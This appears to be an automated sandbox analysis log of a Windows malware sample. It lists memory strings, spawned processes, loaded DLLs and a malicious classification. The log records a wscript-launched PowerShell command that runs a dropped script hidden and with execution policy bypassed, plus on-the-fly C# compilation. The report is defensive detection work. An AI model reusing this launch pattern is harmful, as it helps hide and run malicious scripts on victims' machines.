                      Source: explorer.exe, 0000000B.00000002.3348603804.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2174037688.000000000C84A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 0000000B.00000002.3347671584.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2172780647.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3097166217.000000000C50F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                      Source: powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: explorer.exe, 0000000B.00000002.3340185941.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096799118.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: explorer.exe, 0000000B.00000002.3343227530.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 0000000B.00000002.3340185941.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2164458233.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 0000000B.00000000.2163591321.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3097682652.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3337773082.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                      Source: explorer.exe, 0000000B.00000002.3343227530.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096126515.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: explorer.exe, 0000000B.00000003.3094867488.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009D42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: explorer.exe, 0000000B.00000000.2172780647.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3347671584.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                      Source: explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

                      System Summary

                      barindex
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3500 -s 592
                      Source: classification engineClassification label: mal100.expl.evad.mine.winEXE@18/26@0/0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeFile created: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3500
                      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d21a0362-aa82-43a5-893b-6bfb53517a2eJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeReversingLabs: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3500 -s 592
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic file information: File size 8467456 > 1048576
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x794400
